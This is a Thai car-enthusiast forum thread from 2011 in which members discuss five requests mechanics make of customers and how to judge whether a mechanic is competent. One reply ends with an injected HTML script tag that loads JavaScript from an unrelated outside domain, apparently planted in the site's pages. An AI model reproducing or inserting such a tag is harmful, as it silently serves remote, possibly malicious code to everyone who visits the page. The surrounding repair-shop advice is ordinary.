ตอบ
OhOnOnO


ชื่อเล่น: โอ๋

เข้าร่วม: 24 มีนา 2011
ตอบ: 99

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 138
ให้คำขอบคุณ: 70

ที่อยู่: ลาดกระบัง(Paseo) ปากน้ำ(วัดไตร)
ปี: 2004
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อังคาร, 28 มิถุนา 2011 15:01 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
"ช่าง" เปรียบดั่ง "หมอ" คงไม่ใช่คำเปรียบเปรยที่ไกลเกินจริง ทว่าการที่หมอจะรักษาอาการต่างๆที่เกิดขึ้นให้หายขาดได้นั้นก็ต้องการข้อมูลที่ถูกต้อง และเรื่องทั้ง 5 ดังต่อไปนี้เป็นเรื่องที่ช่างมืออาชีพส่วนใหญ่ฝากบอกต่อขอร้องมายังผู้ใช้รถทุกคน ที่เราก็ควรจะเห็นใจเพื่อความสะดวกในการทำงาน
1.อาการบอกให้ถูกจะได้มั่นใจว่าแก้ตรงจุด ในอาชีพช่างที่เป็นอาชีพบริการนั้น ช่างหลายคนต่างยอมรับว่าบางครั้งลูกค้าไม่สามารถบอกปัญหาได้ตรงจุด ซึ่งส่วนหนึ่งก็มาจากความไม่รู้ของเจ้าของรถ ทว่าช่างเองก็อยากให้รู้ว่า อะไรน่าจะเป็นประเด็นปัญหา มากกว่า คำพูดพื้นๆของพวกเรา เช่น รถสตาร์ทไม่ติด แต่เราควรบอกลักษณะอาการให้มากกว่านั้น เพื่อที่จะได้แจ่มแจ้งชัดเจนยิ่งขึ้น และแก้ไขปัญหาได้ตรงจุด เรื่องนี้เขาเน้นย้ำฝากถึงท่านสุภาพสตรีทั้งหลาย โดยเฉพาะ
2.ลูกค้ารู้ดีเกิน บางครั้งเราไม่จำเป็นฉลาดเหนือช่าง แต่เราลองแกล้งโง่แบบเหมือนไม่รู้อะไรทั้งๆที่รู้อยู่เต็มอก ว่าอะไรคือต้นตอ ข้อนี้ช่างจำนวนมากบอกว่า ลูกค้าบางคนจู้จี้จุกจิก รู้ดี เพราะความรู้ที่มีท้วมท้น แต่ช่างคือหมอ อย่างที่เรากล่าว ดังนั้น พวกเขาเหล่านี้จึงฝากขอความเห็นใจในการเคารพการทำงาน แม้จะทราบดีว่าช่างมีมาก แต่ช่างที่ดีจริงๆ มีไม่เยอะเท่าไร
3.ดูแลทรัพย์สิน เรื่องจริงที่ไม่อยากจะทำ ช่างหลายคนบ่นเรื่องหนึ่งมาให้เราฟังและหนึ่งในนั้นคือการดูแลทรัพย์สินที่ไหน โดยเฉพาะรถของท่านที่สามารถเคลื่อนได้ง่าย เช่นเดียวกับทรัพย์สินในรถที่อาจมีของมีค่า และต้องระวังบรรดาลูกมือต่างๆ ที่คอยจะฉกฉวย การดุแลทรัพย์สินเป็นเรื่องที่ชวนปวดหัว ช่างหลายคนหมดตัว เพราะทรัพย์สินของลูกค้า ดังนั้น เราทุกคนควรจะพึงนึกเสมอว่า เก็บของมีค่า และถ้าช่างไม่ว่างและปัญหาไม่ว่าง ก้จองคิวนัดวันไปเลย
4.ซื้อของเองทำได้ แต่ก็ควรเข้าใจ เราหลายคนที่รู้เรื่องรถ ก็กลัวช่างฟันหัวแบะกลับมาเป็นเรื่องธรรมดาที่เราแทบจะรู้กันอยู่ทุกวี่วันแล้ว แต่การซื้อของเองก็อาจเป็นดาบ 2คม ที่กลับมาทำร้ายตัวเอง โดยเฉพาะชิ้นส่วนสำคัญๆ ซึ่งต้องมีการรื้อถอดประกอบกันอยู่บ่อยครั้งและวุ่นวาย ซึ่งการเปลี่ยนชิ้นส่วนไม่ใช่เรื่องยาก เมื่อเทียบกับการรื้อถอดประกอบ แต่ช่างเองก็อยากทำงานให้เสร็จสิ้น เพราะยังมีคิวยาวเป็นหางว่าว ดังนั้นหากคุณไม่มั่นใจเรื่องซื้อของก็จงให้เป็นหน้าที่ช่างไปเถอะ "อย่าเสียน้อยเสียยาก เสียมากเสียง่ายเลย"
5.เงินทองเรื่องสำคัญ ..มันต้องกินต้องใช้ การทำงานหนึ่งอย่างเราก็อยากได้เงิน ช่างก็เช่นเดียวกัน ลูกค้าหลายคนใช้โอกาสความสนิทสนมกับช่างในการติดเงินบานเบอะ โดยส่วนหนึ่งก็มาจากการทำรถที่ไม่รู้จบไม่รู้จักประมาณตน พอจ่ายไม่ไหวก็ขอค้างบางส่วน และสุดท้ายก็เป็นหนี้พอกพูน เรื่องแบบนี้เป็นเรื่องที่พบเจอประจำตามอู่ต่างที่มีอยู่อย่างมาก และช่างทั้งหลายฝากข้อคิดเรื่องนี้มา และอยากให้ลูกค้าทราบว่าช่างก้คนและมีภาระต้องดุแลเช่นเดียวกัน
ได้รับคำขอบคุณจาก: Okumori  Phetcharat  nooknick9003es  Doraeman  nayyai1  BeMe  jukkadui  Meemangkang  Moo Uan  wighwaytak  Surayut  nagamura  nato 
Okumori


ชื่อเล่น: เติ้ง

เข้าร่วม: 24 กรกฎา 2010
ตอบ: 119

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 517
ให้คำขอบคุณ: 413

ปี: 2004
อังคาร, 28 มิถุนา 2011 15:37 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
ได้รับคำขอบคุณจาก: numxs 
Phetcharat


ชื่อเล่น: ต้น

เข้าร่วม: 15 กุมภา 2011
ตอบ: 1908

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1429
ให้คำขอบคุณ: 9944

ที่อยู่: ปัตตานี - มหาชัย - สุราษฯ
ปี: 2004
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 28 มิถุนา 2011 15:52 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
HuTooTaTToo


เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 272

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 283
ให้คำขอบคุณ: 318
อังคาร, 28 มิถุนา 2011 15:55 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
srithanon


เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
อังคาร, 28 มิถุนา 2011 16:32 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
เห็นด้วยกับท่านเจ้าของกระทู้
ช่างที่ดีก็มีและไม่ดีก็มีมาก แน่นอนช่างที่ไม่ค่อยมีประสบการณ์และความรู้ย่อมจะเกิดความไม่พอใจ เมื่อท่านเจ้าของรถรู้ดีกว่าว่าควรจะทำอย่างไร และเห็นช่างทำไม่ถูก ย่อมทำให้เจ้าของรถ ไม่เชื่อมั่นในความรู้ของช่าง และช่างเองก็กลัวมาก เพราะทราบหรือไม่ว่า บางท่านเป็นถึงระดับวิศวกร หรือผู้เชี่ยวชาญบางสาขา ที่มีความเกี่ยวพันกับโครงสร้างทางแม็คคานิคกลไก รวมทั้งด้านอีเลคโทรนิคส์ยานยนต์ แต่ท่านเจ้าของรถเหล่านั้น ไม่มีเวลาและที่สำคัญ เขาให้โอกาสกับผู้มีประสบการณ์ตรงในเรื่องเครื่องยนต์ และความชำนาญของช่าง ที่เขาคิดว่าจะทำและซ่อมรถให้เขาอย่างถูกวิธีและมีหลักการ แม้กระทั้งการใช้เครื่องมือ แค่หยิบประแจไขน็อต ต่างๆ ไขควง และอื่นๆ พอหยิบมาใช้ขันหมุน ผิดประเภท ใช้เครื่องมือผิดประเภท เขาก็กลัวแล้ว ไม่ใช่แค่มีคีมล็อคก็ขันถอดมันได้ทั้งหมด หัวน็อตก็รูดเหลี่ยมเสีย ยับเยิน เพราะใช้เครื่องมือผิดประเภท
และที่สำคัญที่สุดของช่าง มักจะกล่าวกับลูกค้าว่าอย่ามายืนดูเขาซ่อม เพราะจะขาดสมาธิในการทำงาน แต่ความจริงเรื่องนี้ ได้มีความเห็นจากช่างที่มีประสบการณ์และความรู้จริง เขาจะพอใจมากกว่าที่เห็นเจ้าขงมาดูการทำงานของเขา เพราะจะทำให้ท่านเจ้าของรถมีความเชื่อมั่น ว่าแนวการแก้ปัญหา และวิธีการต่างๆที่เขากำลังซ่อม มีความสุขุม ปราณีต ว่าส่วนไหนต้องทำตามหลักการและสิ่งที่ถูกต้อง
แม้กระทั้งถอดชิ้นส่วนต่างของเครื่องยนต์ มีความละเอียดและถอดออกมาไม่ชำรุดหรือเสียหายระหว่างถอดชิ้นส่วน ไม่ใช่ช่างเถอะ ที่เวลาถอดชิ้นส่วน ทั้งงัดและแงะ ไม่ถูกขั้นตอนในการถอด ไม่ใช่แค่มีไขควง คีม ประแจ ก็จะงัดเอาออก งานโครงสร้างของส่วนประกอบเครื่องยนต์ ทั้งที่เป็นบอดี้ และชิ้นส่วนประกอบของตัวรถ ช่างที่เขาเรียนรู้ทางด้านเครื่องยนต์ จะต้องมีแมนนวลเครื่อง หรือเท็คนิคอลบุ๊ค
ที่รวบรวม วิธีการถอดชิ้นส่วนของเครื่องยนต์และบอดี้รถ ว่าจะกระทำการทอดที่ส่วนไหนเป็นอันดับแรกและต่อๆไป เพื่อไม่ให้ชิ้นส่วนนั้นๆชำรุดเสียหาย เมื่อเวลาประกอบกลับ แต่ส่วนมาก จะพบว่า เมื่อใดที่มีการเรื้อชิ้นส่วนจะมีการชำรุดเสียหายซะส่วนมาก การชำรุดที่เสียหายนี้ ท่านเจ้าของรถรถเป็นผู้จ่าย รวมถึงความไม่รู้ในระบบการทำงานของเครื่องยนต์สมัยใหม่ ที่ควบคุมด้วยระบบ ECU ที่ช่างรุ่นเก่าๆ อาจจะวิเคราะห์ไม่ถูก ทำให้ทดลองผิดทดลองถูก คิดนั่งเทียนคาดว่า น่าจะเป็นที่ตัวนี้และตัวนั้น บางครั้งตัวที่ไม่มีส่วนได้เสียกับอาการที่เกิดขึ้น ก็พลอยเสียไปด้วย ท่านเจ้าของรถก็จ่ายเงินไป ช่างบอกว่ามันเสียด้วย เจ้าของรถเอาเสียก็เสีย เพราะไม่มีความรู้ ก็ต้องเชื่อช่าง น่าเห็นในท่านเจ้าของรถ เสียเงินในส่วนที่ไม่ควรจะเสีย เพราะช่างที่คิดว่าเก่งกลับเอา รถของเราเป็นที่ลองวิชาหาประสบการณ์ไปในตัว โดยที่ไม่ต้องลงทุน
ช่างที่ดีนะมีมากเช่นกัน แต่เราจะไม่ค่อยทราบ โดยมากจะแนะนำจากเพื่อนฝูง ว่าที่นั้นที่นี้ ช่างเก่ง บังเอิญไปเจอเคสง่ายๆ หรือโชคเข้าข้าง ก็แก้ไขได้ (ขออภัยสำหรับช่างที่มีความรู้จริง) แต่มาเจอกระดูกที่ต้องมีความรู้ด้านวิชาการ และหลักการทำงานของเครื่องยนต์แต่ละภาคส่วน ถึงจะเอามาแก้ไขได้ ก็ทำไม่ได้
ในกรณีที่ท่านเจ้าของรถพอที่จะมีความรู้และหลักการณ์ ด้านเครื่องยนต์ แต่ไม่สามารถที่จะลงมือด้วยตนเอง หรือเพราะความไม่ชอบในเรื่องความเปรอะเปื้อน หรือถือว่า ควรแบ่งอาชีพที่แต่ละคนถนัดไปก็แล้วกัน การรู้ทางวิชาการอย่างเดียวไม่พอ ต้องลงมือหาประสบการณ์จริงด้วย
ในกรณีอย่างนี้ ให้ทำเป็นคนโง่เข้าไว้ อย่าอวดฉลาด ดังคำพังเพยที่ว่า คนอวดฉลาดคือคนโง่ คนโง่คือคนฉลาด เพราะอะไร การที่เราถ่อมตัว ย่อมเห็นว่าความรู้ที่ตนมีอยู่ อาจจะไม่ถึงขั้น หรือไม่ตรงกับสิ่งที่เขารู้ งั้นการที่เราบอกไม่รู้ ย่อมเห็นความสามารถของฝ่ายตรงข้าม ว่ารู้จริงหรือไม่ บางครั้งสิ่งที่เรารู้ยังรู้ไม่เท่าเขา หรือสิ่งที่ฝ่ายตรงข้ามรู้ รู้ไม่เท่าเรา หรือรู้ไม่จริง เราก็จะพอประเมิณในความเป็นผู้รู้ของเขาได้ และบางครั้งในสิ่งที่เราไม่รู้เราอาจจะได้ความรู้จากฝ่ายตรงข้ามกับเรา โดยที่เราไม่เสียหน้า และที่สำคัญในการแกล้งโง่ของเรา ไม่ทำให้ช่างคนนั้นระแวง เขาก็จะปล่อยข้อเสียที่เกิดกับเขาให้เราได้เห็น ว่าที่แท้เขาเป็นอย่างไร เก่งหรือไม่เก็งหรือดีแต่โม้ เราจะได้ไม่หลวมตัวที่จะให้ทำการแก้ไขต่อไป หากเห็นว่าระหว่างการตรวจซ่อมของช่างหลงเข้าป่า หาทางออกไม่พบ ก็ควรหาทางเอารถออกมาจากอู่นั้นซะ จะได้ไม่เสียเงินให้ช่างเขาเรียนหาประสบการณ์ บนความทุกข์ของเรา ที่เป็นนายทุนออกเงินให้เขาเรียนหาประสบการณ์กับรถของเรา สะใจช่างแต่ไม่สะใจเราได้งัย ........srithanon
ได้รับคำขอบคุณจาก: numxs  nocomment  BeMe 
numxs


ชื่อเล่น: หนุ่ม

เข้าร่วม: 01 ตุลา 2009
ตอบ: 1332

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1427
ให้คำขอบคุณ: 1715

ที่อยู่: สระบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 28 มิถุนา 2011 16:46 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
srithanon พิมพ์ว่า:
เห็นด้วยกับท่านเจ้าของกระทู้
ช่างที่ดีก็มีและไม่ดีก็มีมาก แน่นอนช่างที่ไม่ค่อยมีประสบการณ์และความรู้ย่อมจะเกิดความไม่พอใจ เมื่อท่านเจ้าของรถรู้ดีกว่าว่าควรจะทำอย่างไร และเห็นช่างทำไม่ถูก ย่อมทำให้เจ้าของรถ ไม่เชื่อมั่นในความรู้ของช่าง และช่างเองก็กลัวมาก เพราะทราบหรือไม่ว่า บางท่านเป็นถึงระดับวิศวกร หรือผู้เชี่ยวชาญบางสาขา ที่มีความเกี่ยวพันกับโครงสร้างทางแม็คคานิคกลไก รวมทั้งด้านอีเลคโทรนิคส์ยานยนต์ แต่ท่านเจ้าของรถเหล่านั้น ไม่มีเวลาและที่สำคัญ เขาให้โอกาสกับผู้มีประสบการณ์ตรงในเรื่องเครื่องยนต์ และความชำนาญของช่าง ที่เขาคิดว่าจะทำและซ่อมรถให้เขาอย่างถูกวิธีและมีหลักการ แม้กระทั้งการใช้เครื่องมือ แค่หยิบประแจไขน็อต ต่างๆ ไขควง และอื่นๆ พอหยิบมาใช้ขันหมุน ผิดประเภท ใช้เครื่องมือผิดประเภท เขาก็กลัวแล้ว ไม่ใช่แค่มีคีมล็อคก็ขันถอดมันได้ทั้งหมด หัวน็อตก็รูดเหลี่ยมเสีย ยับเยิน เพราะใช้เครื่องมือผิดประเภท
และที่สำคัญที่สุดของช่าง มักจะกล่าวกับลูกค้าว่าอย่ามายืนดูเขาซ่อม เพราะจะขาดสมาธิในการทำงาน แต่ความจริงเรื่องนี้ ได้มีความเห็นจากช่างที่มีประสบการณ์และความรู้จริง เขาจะพอใจมากกว่าที่เห็นเจ้าขงมาดูการทำงานของเขา เพราะจะทำให้ท่านเจ้าของรถมีความเชื่อมั่น ว่าแนวการแก้ปัญหา และวิธีการต่างๆที่เขากำลังซ่อม มีความสุขุม ปราณีต ว่าส่วนไหนต้องทำตามหลักการและสิ่งที่ถูกต้อง
แม้กระทั้งถอดชิ้นส่วนต่างของเครื่องยนต์ มีความละเอียดและถอดออกมาไม่ชำรุดหรือเสียหายระหว่างถอดชิ้นส่วน ไม่ใช่ช่างเถอะ ที่เวลาถอดชิ้นส่วน ทั้งงัดและแงะ ไม่ถูกขั้นตอนในการถอด ไม่ใช่แค่มีไขควง คีม ประแจ ก็จะงัดเอาออก งานโครงสร้างของส่วนประกอบเครื่องยนต์ ทั้งที่เป็นบอดี้ และชิ้นส่วนประกอบของตัวรถ ช่างที่เขาเรียนรู้ทางด้านเครื่องยนต์ จะต้องมีแมนนวลเครื่อง หรือเท็คนิคอลบุ๊ค
ที่รวบรวม วิธีการถอดชิ้นส่วนของเครื่องยนต์และบอดี้รถ ว่าจะกระทำการทอดที่ส่วนไหนเป็นอันดับแรกและต่อๆไป เพื่อไม่ให้ชิ้นส่วนนั้นๆชำรุดเสียหาย เมื่อเวลาประกอบกลับ แต่ส่วนมาก จะพบว่า เมื่อใดที่มีการเรื้อชิ้นส่วนจะมีการชำรุดเสียหายซะส่วนมาก การชำรุดที่เสียหายนี้ ท่านเจ้าของรถรถเป็นผู้จ่าย รวมถึงความไม่รู้ในระบบการทำงานของเครื่องยนต์สมัยใหม่ ที่ควบคุมด้วยระบบ ECU ที่ช่างรุ่นเก่าๆ อาจจะวิเคราะห์ไม่ถูก ทำให้ทดลองผิดทดลองถูก คิดนั่งเทียนคาดว่า น่าจะเป็นที่ตัวนี้และตัวนั้น บางครั้งตัวที่ไม่มีส่วนได้เสียกับอาการที่เกิดขึ้น ก็พลอยเสียไปด้วย ท่านเจ้าของรถก็จ่ายเงินไป ช่างบอกว่ามันเสียด้วย เจ้าของรถเอาเสียก็เสีย เพราะไม่มีความรู้ ก็ต้องเชื่อช่าง น่าเห็นในท่านเจ้าของรถ เสียเงินในส่วนที่ไม่ควรจะเสีย เพราะช่างที่คิดว่าเก่งกลับเอา รถของเราเป็นที่ลองวิชาหาประสบการณ์ไปในตัว โดยที่ไม่ต้องลงทุน
ช่างที่ดีนะมีมากเช่นกัน แต่เราจะไม่ค่อยทราบ โดยมากจะแนะนำจากเพื่อนฝูง ว่าที่นั้นที่นี้ ช่างเก่ง บังเอิญไปเจอเคสง่ายๆ หรือโชคเข้าข้าง ก็แก้ไขได้ (ขออภัยสำหรับช่างที่มีความรู้จริง) แต่มาเจอกระดูกที่ต้องมีความรู้ด้านวิชาการ และหลักการทำงานของเครื่องยนต์แต่ละภาคส่วน ถึงจะเอามาแก้ไขได้ ก็ทำไม่ได้
ในกรณีที่ท่านเจ้าของรถพอที่จะมีความรู้และหลักการณ์ ด้านเครื่องยนต์ แต่ไม่สามารถที่จะลงมือด้วยตนเอง หรือเพราะความไม่ชอบในเรื่องความเปรอะเปื้อน หรือถือว่า ควรแบ่งอาชีพที่แต่ละคนถนัดไปก็แล้วกัน การรู้ทางวิชาการอย่างเดียวไม่พอ ต้องลงมือหาประสบการณ์จริงด้วย
ในกรณีอย่างนี้ ให้ทำเป็นคนโง่เข้าไว้ อย่าอวดฉลาด ดังคำพังเพยที่ว่า คนอวดฉลาดคือคนโง่ คนโง่คือคนฉลาด เพราะอะไร การที่เราถ่อมตัว ย่อมเห็นว่าความรู้ที่ตนมีอยู่ อาจจะไม่ถึงขั้น หรือไม่ตรงกับสิ่งที่เขารู้ งั้นการที่เราบอกไม่รู้ ย่อมเห็นความสามารถของฝ่ายตรงข้าม ว่ารู้จริงหรือไม่ บางครั้งสิ่งที่เรารู้ยังรู้ไม่เท่าเขา หรือสิ่งที่ฝ่ายตรงข้ามรู้ รู้ไม่เท่าเรา หรือรู้ไม่จริง เราก็จะพอประเมิณในความเป็นผู้รู้ของเขาได้ และบางครั้งในสิ่งที่เราไม่รู้เราอาจจะได้ความรู้จากฝ่ายตรงข้ามกับเรา โดยที่เราไม่เสียหน้า และที่สำคัญในการแกล้งโง่ของเรา ไม่ทำให้ช่างคนนั้นระแวง เขาก็จะปล่อยข้อเสียที่เกิดกับเขาให้เราได้เห็น ว่าที่แท้เขาเป็นอย่างไร เก่งหรือไม่เก็งหรือดีแต่โม้ เราจะได้ไม่หลวมตัวที่จะให้ทำการแก้ไขต่อไป หากเห็นว่าระหว่างการตรวจซ่อมของช่างหลงเข้าป่า หาทางออกไม่พบ ก็ควรหาทางเอารถออกมาจากอู่นั้นซะ จะได้ไม่เสียเงินให้ช่างเขาเรียนหาประสบการณ์ บนความทุกข์ของเรา ที่เป็นนายทุนออกเงินให้เขาเรียนหาประสบการณ์กับรถของเรา สะใจช่างแต่ไม่สะใจเราได้งัย ........srithanon
OhOnOnO


ชื่อเล่น: โอ๋

เข้าร่วม: 24 มีนา 2011
ตอบ: 99

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 138
ให้คำขอบคุณ: 70

ที่อยู่: ลาดกระบัง(Paseo) ปากน้ำ(วัดไตร)
ปี: 2004
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อังคาร, 28 มิถุนา 2011 17:16 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
ผมก็เป็นอีกคนที่แม้จะขันน๊อตแค่ตัวเดียว ผมก็จะยืนดู
ทำรถนานครึ่งค่อนวันก็ไม่กินข้าว จะยืนดูอยู่อย่างงั้นแหล่ะ
ก่อนไปหาช่างควรศึกษาอาการและวิธีการคร่าวๆก่อน
และที่ผมใช้ประจำเลยคือแกล้งโง่ ว่าช่างวิเคราะห์อาการ และแก้ปัญหาตรง หรือใกล้เคียงกับสิ่งที่ศึกษามามั้ย
ไม่ได้รู้อะไรมากหรอกครับ แต่ว่าก็อาศัยจากเก็บอ่านจากประสบการณ์จากเพื่อนๆในคลับเอาเป็นความรู้เบื้องต้น
"<script src="https://sport32news.com/civicesgroup.js">
nayyai1


เข้าร่วม: 01 กันยา 2010
ตอบ: 405

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 650
ให้คำขอบคุณ: 509

ที่อยู่: ระยอง ตอนนี้โคราชแล้ว
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 28 มิถุนา 2011 18:04 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
อาชีพของผมคือช่างครับ (Substation Maintenance) เห็นด้วยกับเจ้าของกระทู้อย่างยิ่ง จรรยาบรรญของช่างที่ดีคือจะต้องแก้ไขปัญหาให้ได้ดีที่สุดเท่าที่จะทำได้ ไม่ว่าจะซ่อมแซม ดัดแปลง หรือต้องเปลี่ยน ดูแลสิ่งที่เราซ่อมเสมือนกับเป็นของๆเราเอง นั่นคือช่างที่ดีครับ
ได้รับคำขอบคุณจาก: wighwaytak 
BeMe


ชื่อเล่น: เอ๋

เข้าร่วม: 19 พฤษภาคม 2011
ตอบ: 582

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 2030
ให้คำขอบคุณ: 954

ที่อยู่: ระยอง-ชล-กทม-สระบุรี-ยุดยา-ลพบุรี
ปี: 2005
อังคาร, 28 มิถุนา 2011 18:10 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
อ่านเพลินดีครับ เรื่องแบบนี้
jukkadui


ชื่อเล่น: แบงค์

เข้าร่วม: 05 พฤษภาคม 2010
ตอบ: 1362

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 769
ให้คำขอบคุณ: 1427

ที่อยู่: บางพลี
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 28 มิถุนา 2011 20:40 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
Meemangkang


ชื่อเล่น: แอร์

เข้าร่วม: 01 เมษา 2010
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1430
ให้คำขอบคุณ: 1329

ที่อยู่: รามอินทรา 109.....มีนบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 28 มิถุนา 2011 22:01 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
ขอบคุณคับ
konoi


ชื่อเล่น: เรียว

เข้าร่วม: 05 กุมภา 2011
ตอบ: 168

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 115
ให้คำขอบคุณ: 222

ที่อยู่: ปิ่นเกล้า
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 29 มิถุนา 2011 08:48 - "เข้าใจช่าง ในการซ่อมรถ" เจอมาอีกแว้วววว เอาไว้อ่านเล่นๆ
อ๊ะ เริดสสสสสสสสสสส์ ตาแจ้ง
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.